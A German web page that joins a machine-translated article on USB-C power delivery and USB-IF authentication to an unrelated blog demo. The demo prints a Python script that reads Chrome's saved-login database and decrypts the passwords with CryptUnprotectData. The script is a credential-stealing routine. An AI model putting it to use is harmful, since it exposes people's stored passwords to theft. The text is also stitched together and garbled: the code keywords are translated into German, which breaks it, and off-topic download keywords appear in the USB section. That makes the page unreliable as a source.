USB-C Ubiquity bedeutet umweltfreundlicheres Laden und robustere Sicherheit.

Der Konnektivitätsstandard, der gleichzeitig Geräte versorgt, entwickelt sich schnell zum Messer der Schweizer Armee für Elektronikverbinder. Es bewegt nicht nur Daten von Geräten, die es versorgt, hin und her, sondern sichert auch die Daten. In einem Telefoninterview mit der EE Times sagte Ganesh Subramaniam, Senior Director of USB product lines bei Cypress Semiconductor, dass USB-C „der einzelne Stecker sein wird, den man an fast allem befestigen kann“, sogar an elektrischen Rasierern und Elektrowerkzeugen.

Das Unternehmen hat kürzlich den EZ-PD Power Adapter Generation 1 (PAG1) vorgestellt, das neueste Mitglied seiner USB-C Power Delivery Familie. PAG1 liefert AC/DC-Leistung über einen integrierten USB Power Delivery (PD) Controller. Subramaniam sagte, dass es den OEMs ermöglichen wird, zuverlässige, effiziente und kostengünstige Netzteile für den wachsenden USB-C-Ladegerätemarkt zu bauen. Da PAG1 vollständig programmierbar ist, profitieren OEMs von einer höheren Zuverlässigkeit und einer reduzierten Stückliste. Darüber hinaus können sie ihr USB-Ladegerätangebot für viele gängige Ladestandards konfigurieren, darunter Apple Charging und Samsung Adaptive Fast Charging (AFC). Das betrifft natürlich nicht nur das Laden unserer Smartphones sondern auch die Verbindung über Softwareangebote wie die Nokia PC Suite Download Deutsch oder Apple Itunes Deutsch Download.

USB C

Auch Umwelttechnich positiv

In der Vergangenheit waren die Datenübertragungsraten der größte Treiber für die USB-Evolution – niemand will Stunden darauf warten, dass seine Videos oder Fotos von seinem Smartphone auf seinen Computer übertragen werden. Laut Subramaniam ist die Stromversorgung jedoch der größte Treiber für USB-C. Für Cypress ist es das erste Mal, dass das Unternehmen in den AC/DC-Controllerraum eintritt, aber es sieht eine große Akzeptanz für strombezogene USB-Anwendungen. „Die meisten US-Autohersteller stecken bereits USB-C in ihre Autos“, sagte Subramaniam. Nicht nur, dass die Menschen ihr Handy schnell in ihrem Fahrzeug aufladen wollen, sondern auch andere Geräte, was bedeutet, dass 15 Watt nicht mehr ausreichen – Automotive USB wird 100 Watt drücken müssen.

Es gibt auch einen positiven Umweltnebeneffekt für die kommende USB-C Allgegenwart – das Ableben von benutzerdefinierten Ladegeräten, die so aussehen, als sollten sie in jedes Gerät passen, aber nur mit dem Gerät funktionieren, mit dem sie verkauft wurden. Subramaniam sagte, dass es immer häufiger vorkommen wird, USB-C-Anschlüsse in Steckdosen zu verwenden – Sie können Ihr Smartphone anschließen, um es aufzuladen, ohne ein Netzteil zu benötigen. „Es sind Einsparungen für den Hersteller, was bedeutet, dass Sie weniger Ladegeräte gekauft haben, was viel weniger E-Müll bedeutet“, sagte Subramaniam.

USB-C ist nicht nur besser für den Planeten, sondern wird auch sicherer. Anfang des Jahres kündigte die USB-FI ein Authentifizierungsprogramm an, das ein optionales USB-Sicherheitsprotokoll und eine Authentifizierungsspezifikation beinhaltet. „Es kann buchstäblich jedes Gerät authentifizieren“, sagte USB-IF-Präsident Jeff Ravencraft, egal ob es sich um einen PC-Host, einen traditionellen Desktop oder Laptop, ein Tablett, ein Telefon handelt.

Sicherheitsprotokoll mit guter Grundlage

Das Sicherheitsprotokoll wurde auf der Grundlage von Feedback der Host-Hersteller entwickelt. Laut Ravencraft: „Es ermöglicht Host-Systemen, sich vor Risiken durch nicht konforme USB-Ladegeräte, -Geräte und -Kabel sowie böswillig eingebettete Hard- und Software von jedem USB-Gerät zu schützen, das versucht, eine USB-Verbindung auf dem Host auszunutzen“. Vereinfacht ausgedrückt bedeutet dies, dass Sie Ihren Freund sein Smartphone aufladen lassen können, indem Sie es an Ihren Computer anschließen, aber die inhärente USB-C-Sicherheit wird es nicht zulassen, dass es etwas anderes tut, wie z.B. Daten übertragen oder Ihren PC mit Malware infizieren.

Auf breiterer Ebene, so Ravencraft, werden Unternehmen ihre eigenen Richtlinien entwickeln, wie sie USB-C-Geräte verwalten wollen, basierend auf ihrer Fähigkeit zur Authentifizierung und entsprechenden Bereitstellung. Das Sicherheitsmerkmal erfordert neue Hard- und Software auf dem Gerät und dem Host, und obwohl es keine Voraussetzung für die USB-IF-Zertifizierung ist, erwartet er, dass diese Authentifizierungsübernahme in diesem Jahr anlaufen wird.

Warum Sie Passwörter niemals auf Chrome oder Firefox speichern sollten

In diesem Artikel werde ich zeigen, wie einfach es für Hacker ist, jeden Benutzernamen und jedes Passwort zu extrahieren, das in deinem Chrome-Profil gespeichert ist. Man könnte meinen, dass Chrome oder auch Firefox Sicherheitsmaßnahmen zur Verschlüsselung des Passworts haben würde, aber anscheinend ist das nicht der Fall – irgendwie. Mein Chrome-Profil ist, wie viele andere auch, so eingerichtet, dass es ein anderes Verschlüsselungspasswort gibt, das ich eingeben muss, um alle meine Passwörter, Lesezeichen, Einstellungen, Browserverlauf usw. zu synchronisieren, also war es für mich ziemlich schockierend, wie einfach es für mich war, meine Passwörter zu extrahieren und zu entschlüsseln. Zwölf Zeilen Code einfach.

Password

Demonstration und Proof of Concept

Bevor wir anfangen, sollte ich erwähnen, dass ich dies nicht unter macOS oder anderen Linux-Distributionen getestet habe. Um diese Demo zu replizieren, müssen Sie sich in einer Windows-Umgebung mit Python befinden.

Zuerst importieren wir alle erforderlichen Abhängigkeiten und legen den Ordnerort für die Benutzerdaten Ihres Chrome-Profils fest. Erforderliche Abhängigkeiten: sqlite3 und win32crypt

# os und sqlite3 werden standardmäßig mit Python ausgeliefert. Wenn Sie Importfehler für win32crypt erhalten, verwenden Sie „pip install pypiwin32“, um die Abhängigkeit zu installieren.

importieren von os, sqlite3, win32crypt

# Holt automatisch den Standardordner des angemeldeten Benutzers.

data = os.path.expanduser(‚~‘)+“\AppData\Local\Google\Chrome\User Data\Default\Login Data“.

Als nächstes müssen wir sqlite3 verwenden, um uns mit der Datenbank zu verbinden, in der Chrome alle Ihre Benutzerdaten speichert. Werfen wir einen Blick auf die Datenbankstruktur. Ich habe ein kostenloses Tool namens SQLite Expert verwendet, aber die Wahl der Software ist nicht wichtig oder sogar notwendig – ich bin nur ein sehr visueller Typ.

Ausgehend von der Datenbanktabelle fallen mir drei Spalten auf: action_url, username_value und password_value. Beachten Sie, dass der Typ password_value BLOB ist – er ist verschlüsselt, aber mit schlechtem Design (dazu kommen wir gleich).

Sieht aus wie ein Haufen Kauderwelsch, oder? Nicht mehr lange.

Von hier aus machen wir eine einfache SQL-Abfrage, um die entsprechenden Werte zu holen und zur Entschlüsselung zu speichern.

Wenn Sie einen Fehler bei der Sperrung der Datenbank erhalten, liegt das daran, dass ein anderes Programm (vermutlich das Chrome-Fenster, das Sie auf 😉 lesen) die Datenbank bereits geöffnet hat. Sie müssen alle Ihre Chrome-Fenster schließen und aus Sicherheitsgründen eine control+alt+delete durchführen, um sicherzustellen, dass keine veralteten Chrome-Dienste ausgeführt werden.

# Verbinden mit der Login-Daten-Datenbank

Verbindung = sqlite3.connect(data)

cursor = connection.cursor()

# Abfrage der Werte, die für uns von Interesse sind.

cursor.execute(‚SELECT action_url, username_value, password_value FROM logins‘)

final_data = cursor.fetchall()

# Schließen der Datenbankverbindung

cursor.close()

Das verschlüsselte Passwort, das wir jetzt gesammelt haben, wurde von einer Windows-Funktion, CryptProtectData, generiert. Die Daten können nur von einem Benutzer mit den gleichen Windows-Anmeldeinformationen und dem gleichen Computer, auf dem sie verschlüsselt wurden, entschlüsselt werden. Klingt super sicher! Stimmt’s?

Nun, nein. Wenn es einem Hacker gelungen ist, Zugriff auf Ihren Computer zu erhalten, sei es über einen ungeschützten Port oder einen Botnet-Trojaner, mit dem Sie sich infiziert haben, dann hat der Hacker bereits Ihre Windows-Anmeldeinformationen und die Entschlüsselungsfunktion würde auf Ihrem Computer ausgeführt. Und genau wie bei CryptProtectData gibt es auch hier eine CryptUnprotectData-Funktion, mit der wir die Klartextversion der Passwörter abrufen können.

# Iterating through all the values found…..

für chrome_logins in final_data:

    Passwort = win32crypt.CryptUnprotectData(chrome_logins[2], Keine, Keine, Keine, Keine, Keine, 0)[1]

    print(„Website : „+str(chrome_logins[0]))

    print(„Benutzername : „+str(chrome_logins[1]))

    print(„Passwort : „+str(Passwort))

Und das ist alles. In nur zwölf Zeilen Code habe ich alle 588 gespeicherten Passwörter in Klartext aus dem Jahr 2011 extrahiert.

Auch andere sensible Daten wie Browserverlauf und Cookies werden mit ähnlichen Methoden einfach extrahiert.

Abschließende Gedanken

Ich dachte, dass die Verwendung eines anderen Passworts für jede Website-Anmeldung ausreicht, um mich zu schützen. Dies kann für Websites gelten, die eine 2-Faktor-Authentifizierung anbieten, aber die Realität ist, dass die meisten Websites noch keine 2FA-Funktionen integriert haben.

Wie schützen wir also unsere Chrome und Firefox Passwort? Es scheint, dass ein Passwortmanager eines Drittanbieters, von dem es heute eine Menge auf dem Markt gibt, eine intelligente Wahl wäre (recherchieren Sie selbst, denn offen gesagt habe ich ihn bisher nicht benutzt und kann keinen Vorschlag machen). Eines ist jedoch klar – sich auf Chrome zu verlassen, um seine Passwörter zu schützen, ist eine sehr, sehr schlechte Idee.

Ich muss zugeben, die Liste der Passwörter durchzugehen, war wie eine Reise in die Vergangenheit. Seiten, die ich lange vergessen habe, Konten, die ich vergessen habe, und sogar ein paar Krypto-Währungswechsel, die ich vergessen habe, hatte ich Geld dabei. Hier ist eine etwas längere Version dieses Skripts, die alle Informationen in einer Textdatei speichert, die Sie sich ansehen können, wenn Sie Ihre gesamten gespeicherten Anmeldedaten sehen möchten.